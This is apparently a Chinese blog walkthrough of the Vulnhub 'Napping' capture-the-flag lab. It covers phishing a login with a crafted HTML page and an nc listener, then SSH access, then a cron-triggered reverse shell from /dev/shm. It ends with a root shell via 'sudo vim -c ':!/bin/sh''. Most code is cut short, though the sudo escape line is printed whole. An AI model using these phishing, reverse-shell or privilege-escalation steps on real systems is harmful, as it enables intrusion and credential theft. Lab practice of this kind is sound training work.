Vulnhub-Napping
描述
- Name: Napping: 1.0.1
- Date release: 22 Oct 2021
- Author: hadrian3689
- Series: Napping
Even Admins can fall asleep on the job
This works better with VirtualBox rather than VMware ## Changelog v1.0.1 - 2021-10-30 v1.0.0 - 2021-10-22
ip扫不到
1 | 开机按 shift |
nmap信息收集
主机发现

1 | kali 192.168.169.220 |
靶机ip扫描

网页信息

注册用户


钓鱼
下载网页
1 | wget http://192.168.169.230/index.php |

- 创建一个html文件,写入钓鱼网站的代码(文中该文件名为1.html) ; 注意ip
1 | <!DOCTYPE html> |
- 使用python开启一个http服务,使用nc监听钓鱼网站中使用的端口,在正常网页中填写构造的URL提交后,等待2-3分钟左右,NC就会返回一个用户名和密码


1 | http://192.168.169.220:808/1.html |
- 提交链接

- 得到账号密码

1 | username= daniel |
ssh
网页直接登录是登录不上去的
ssh连接

查看文件


1 | 第一个是判断网站是否正常启动,并打印时间 |
提权
- 在 /dev/shm 目录中创建一个反向 shell bash 脚本:
1 | #!/bin/bash |
- 更改一下 query.py 这个个脚本来让他定时反弹shell:

- nc 监听,等了一会得到反向shell:


- 直接写入 Vim-shell:
1 | sudo /usr/bin/vim -c ':!/bin/sh' |


结束
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来自 Putdownd’s Blog!

